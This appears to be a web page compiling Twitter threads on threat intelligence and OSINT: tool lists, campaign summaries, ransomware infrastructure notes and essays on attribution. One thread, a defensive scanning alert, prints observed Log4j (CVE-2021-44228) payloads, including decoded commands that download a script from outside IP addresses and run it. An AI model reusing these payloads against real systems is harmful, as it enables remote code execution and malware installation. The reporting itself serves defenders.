Discover and read the best of Twitter Threads about #ThreatIntel

#OSINT: This time, I'll do a recap of all my popular tweets (threads) about tools and methods for investigations.🔎

Thread of Tools and methods for investigations.

#DataBreach #Socmint #ThreatIntel #GoogleCloudShell #ManuelBot #Leaks
🧵THREAD🧵
1⃣ Thread of tools and methods for investigations🔎 by email addresses.
2⃣ 12 free OSINT resources (books, manuals, presentations and research papers translated into Spanish) to go from zero to hero.
(1/6) To all investigators out there who have heard of #Maltego before, but still looking for more information. Here's what you need to know about Maltego 👇 #OSINT #infosec
(2/6) #Maltego is a link analysis tool that helps you automatically pull and map data from over 70 public data sources (#OSINT) and third-party data providers, and your own imported or custom data integrations. All of this done with a few clicks on the mouse in one interface.
(3/6) You start by providing input information for your investigation (name, alias, domain, IP address, etc.), install the data integrations you want to use, and #Maltego will retrieve relevant Entities from the data integrations and visualize the data connections between them.
With the release of my open-source #CobaltStrike stager decoder (which you can read about here: stairwell.com/news/stairwell…) I thought I'd make a thread showcasing some of the other great open-source tooling out there to help with Cobalt Strike #ThreatHunting and #ThreatIntel 🧵
github.com/RomanEmelyanov…: These are the OG scripts designed for interfacing with Team Servers. Famous for its get_beacon script for milking staged payloads from Team Servers and decrypting them, this GH account also has a script for logging into teamservers and wordlists💀
github.com/JPCERTCC/aa-to… The first Cobalt Strike Beacon configuration extractor that I was aware of, @jpcert_en created a volatility plugin for finding and parsing Beacon configs from memory
📢I recently investigated a campaign targeting the cryptocurrency industry. I wrote a detailed report that includes TTPs, IOCs and more. Here is a thread about this attack! 🧵👇

@MsftSecIntel @MicrosoftAU #infosec #cryptocurrency #threatintelligence #apt

microsoft.com/en-us/security…
The attack started on Telegram to identify the targets, then they deployed a weaponized Excel document which finally delivered the final backdoor through multiple mechanisms. ☠☠️ #infosec #malware #backdoor
🧐To identify the targets, the threat actor sought out members of cryptocurrency investment groups on Telegram.

👀They created fake profiles using details from employees of the company OKX. #infosec #Cryptocurency
For those who do #ThreatIntel; could you please read this thread and share with me your thoughts?

1. Client signs up for a service
2. Client after a while sends email requesting their email to be deleted from our systems to limit online exposure
3. Client gets email deleted

1/3
After a month+
1. Client signs up for service again using a different email
2. After a while, client sends an email requesting account deletion claiming they're limiting their online exposure

Question after this scenario: what is the real benefit they gain from this? #OSINT

2/3
You might be asking how I noticed this? The answer is they used the exact same email! It was very clear to me that I've seen this before & a quick search revealed that my brain was still functioning! 😊

I would appreciate anyone educating me with ideas! #ThreatIntel #OSINT

3/3
It is done! This should have been released a long time ago but I am glad I took the time to finish it.

For those of you who are into #osint or for #threatintel I am releasing my OSINT Notebook to share with you all.

github.com/tjnull/TJ-OSIN…
This notebook provides an overview of the tools, techniques, and resources that I use for a variety of situations for performing reconnaissance and OSINT operations. This Notebook has helped me in many situations to learn more about OSINT.
If you do not use Joplin I have provided raw markdown files that you can use to integrate into the note taking tool that you use.
#OSINT: Thread of tools and methods for investigations🔎 by email addresses.
#AnalistaOsint #Cybersecurity #DataBreach #ToolsOsint #EmailOsint #OSINT #leaks #ThreatIntel #GoogleCloudShell #ManuelBot
🧵THREAD🧵
1⃣ - EPIEOS. 🕵️‍♀️A tool that extracts valuable information from an email address, whether Hotmail or Gmail📧, linking it to other services such as Skype, Spotify, Twitter, among others.

epieos.com
2⃣ - 🔎 IDENTIFICATOR SPACE. A tool that automates OSINT searches by collecting data from public sources through a system of modules.
identificator.space/search
🧵Thread: 10 underestimated resources about malware techniques.

This is a list of various resources to learn more about malware techniques, how to analyse them and how to improve your detection! 🤓 #infosec #malware #threatintel #malwareanalysis #cybersecurity
#1: The Unprotect Project

Of course, I couldn't start this thread without talking about this project we started in 2015. Unprotect Project is a database about Malware Evasion techniques with code snippets and detection rules. cf: @DarkCoderSc

🌐unprotect.it
#2: The LolBas project

Living off the land refers to the use of dual-use tools, which are either already installed in the victims' environment, or are admin, forensic or system tools used maliciously.

🌐lolbas-project.github.io
Hey there, today we have something special for you.

Here's a list of SPY/INTELLIGENCE agencies across the world. 🕵️‍♀️🕵🌍🔎

#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT

1. RAW (Research & Analysis Wing), India
Formed: 21 September 1968
2. CIA (Central Intelligence Agency), USA
Formed: September 18, 1947
#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT
3. Mossad, Israel
Formed: 13 December 1949 (as the Central Institute for Coordination)
#ThreatHunting #threatintelligence #ThreatIntel #military #OSINT
Save this list of resources for your future #OSINT Investigations!

intelx.io: Search engine for data breaches
netlas.io: Search & monitor devices connected to the internet
urlscan.io: Scan a website's incoming and outgoing links and assets
prowl.lupovis.io: Free IP search & identifications of IoC and IoA
fullhunt.io: Identify an attack surface
zoomeye.org: Cyberspace search engine, users can search for network devices
leakix.net: Identify public data leaks
greynoise.io: Search for devices connected to the internet
search.censys.io: Get information about devices connected to the internet
hunter.io: Search for email addresses
#ICYMI, here's a #threatintel related🧵👇 by me on @USTreasury advisory on DPRK IT workers' attempts to obtain employment while posing as non-North Korean nationals: home.treasury.gov/system/files/1… (1/?)
DPRK IT workers "engage in a wide range of IT dev work, such as: mobile & web-based apps, virtual currency exchange platforms & digital coins. Some
designed virtual currency exchanges or created analytic tools/apps for virtual currency traders & marketed their products." (2/?)
This reminds me, for example, of Marine Chain Token: (justice.gov/opa/pr/three-n…; justice.gov/opa/press-rele…), #AppleJeus (cisa.gov/uscert/ncas/al…) and, more recently, #TraderTraitor (cisa.gov/uscert/ncas/al…). #HIDDENCOBRA/#APT38 loves loves loves their crypto (3/?)
Visualizing #cybersecurity concepts can be a great way to learn more about specific tools, methodologies, and techniques! Here is a thread that shows 6 useful infographics on threat intelligence and related topics!🧵👇#infosec #threatintel

1⃣ - Practical Threat Intel
2⃣ - Tactics, Techniques and Procedures is an important concept to understand when you are working on threat intelligence to understand the capabilities of threat actors! 🤓 #Infosec #ttp
3⃣ - The Mitre ATT&CK Matrix has become one of the references for classifying and categorizing attackers' TTPs! ☠️ #cybersecurity
Many #threatintel teams likely have a new requirement to provide daily (or more!) updates on the UA/RU war to include cyber threat activity AND factors like sanctions, military developments, etc. This is not easy. Here are my ✅ tips for surviving "intel update fatigue" 🧵.
✅ Reduce, filter sources

There is too much information--much of it unconfirmed--from disparate sources. Stick to news from reliable and official sources (national CERTs, your intel providers, AP, Reuters, BBC, etc.) who have done the vetting for you.
✅ Change your dissemination habits; prioritize speed

If your team typically disseminates information via traditional reports (presumably over email), consider creating a dedicated chat channel with your security and business partners exclusively for fast updates...
My parents have been looking to buy an RV and this evening my Mom found an oddly cheap RV on an "RV Trader" website. I'm pretty sure it's a scam - come with me while I investigate and use some #OSINT along the way! #ThreatIntel #SCAM #infosec
The link my mom sent was for a 2005 Airstream Bambi, for 9,800 dollars - wait, that seems way too cheap!
First red flag, the website doesn't seem to give you any information....you need to click "request more info" which prompts for your contact information.
Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution (github.com/advisories/GHS…).

Query our API for "tags=CVE-2021-44228" for source IP addresses and other IOCs. #threatintel
Example CVE-2021-44228 payload:
${jndi:ldap://80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}

Decoded:
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash

Source IP:
62.76.41.46 (🇷🇺)
Example CVE-2021-44228 payload (decoded):
wget http://62.210.130.250/lh.sh;chmod +x lh[.]sh;./lh.sh
http://62.210.130.250/lh.sh

Type:
DDoS malware (virustotal.com/gui/file/2b794…)

Source IP:
45.137.21.9 (🇧🇩/🇳🇱)
Today I started compiling a list of the #twitter accounts of companies that develop useful #OSINT tools.

twitter.com/i/lists/143849…

In this thread🧵, I'll talk about the project behind each account on this list.
@haveibeenpwned Check if your email or phone is in a data breach haveibeenpwned.com

@duckduckgo Privacy search engine duckduckgo.com

@webintmaster Companies research tool tradint.io/tradint-resear…
@Fear_the_Foca tool used to find metadata and hidden information in documents

@SpyseHQ internet access search engine spyse.com

@sploitus_com tools & exploits search engine sploitus.com
In light of the recent #SupplyChain attack on @KaseyaCorp by #REvil, it is worth paying attention to decoder[.]re included within the ransom notes, used additionally to 'mirror' in the TOR network. #Ransomware #Cybersecurity #ThreatIntel #ThreatHunting #Malware
Similar to decryptor[.]cc and decryptor[.]top in previous #REvil/#Sodinokibi versions, decoder[.]re is used to grant the victims access to the threat actors' website for further negotiations should their connection be limited via #TOR.
To access the page in WWW or TOR - the victim needs to provide a valid UID (e.g. "9343467A488841AC")
ICYMI, @PwC_UK's 2020 #threatintel Year in Retrospect report is out now! All team contributed but h/t to @KystleM_Reid! 🔥 You can check it out here: pwc.to/2ZPx7fo In this thread, I will summarise some of what I thought were key findings: 🧵👇 1/n
#Ransomware has become the most significant cyber security threat faced by organisations, irrespective of industry/location. TTPs have pivoted to mass data exfiltration prior to encryption, along with leaks & extortion. S/o to @andyp346 for all your work countering this.🙏 2/n
In 2020, 86% of the incidents that PwC’s Incident Response team responded to were attributable to cyber criminals. 79% of leaks happened in 2nd half of 2020. Our data sees Manufacturing, TMT, & Professional Services most impacted. 3/n
I'm generally a pretty positive person, but it's Festivus, so let's blow off some steam and air our #threatintel grievances. Threat intel feeds are just data feeds, they're not threat intel. Please stop naming groups after malware, it's confusing AF.
Nation states are not countries. CC @cnoanalysis en.wikipedia.org/wiki/Nation_st…
If you use fear, uncertainty, and doubt to sell things, you are a GRINCH and please stop.
A thread on bad analysis. When #ThreatIntel analysts want to show off their Foreign Policy and Economist subscription status after reading the Russian foreign policy Wikipedia page /n #threatintelligence #cybersecurity #infosec
Most analysts who are "doing attribution" aren't doing good cyber threat intelligence, they're doing poor foreign policy analysis
They have neither the data nor the expertise to make even a moderately confident statement on attribution.
My paper on “Public Attribution of Cyber Intrusions” was published in the Journal of Cybersecurity (@OUPAcademic). It's open access so everyone can have a read. I summarize the main insights in the thread below:
academic.oup.com/cybersecurity/…
Drawing on the intelligence studies literature, I argue that public attribution is employed to shape the “rules of the game” and thereby shape the normative and operational environment for cyber operations.
I split attribution into sense-making and meaning-making processes: the sense-making process refers to the knowledge-generation process that establishes what happened, the meaning-making process to deliberate actions that influence how others interpret a particular cyber intrusion.
Sunday's fun fact on inferences:
Arthur Conan Doyle's fictional character "Sherlock Holmes" is based on his real-life professor under whom he studied medicine, Dr. Joseph Bell.

"It is most certainly to you that I owe Sherlock Holmes and though in the stories I have the advantage
...of being able to place Sherlock in all sorts of dramatic positions, I do not think his analytical work is in the least an exaggeration of some effects which I have seen you produce in the outpatient ward"
wrote Conan Doyle in a letter to Dr. Bell.
Apparently, other than his medical education, Dr. Bell was also very knowledgeable in other areas such as geography and the cultures, the dialects, patterns of speech and behavior, the army, and more. He was also very observant.
False flag operations are very rare because they're risky and the blowback effects are bad. Interestingly, the risks increase the more "important" you are so the most powerful countries are less likely to conduct FF ops. /1 #infosec #cybersecurity #ThreatIntel
Traditional covert and clandestine operations are cheaper, less risky, and more likely to succeed than false flag ops. Importantly, not all attempts to redirect blame are false flags; many are just considered standard covert ops. /2
False flags are also generally misunderstood and confused. For example, using Russian as an English speaker in malware is, by itself, not a false flag but rather just considered good covert practice. It doesn't attempt to place blame but just conceal the operators better. /3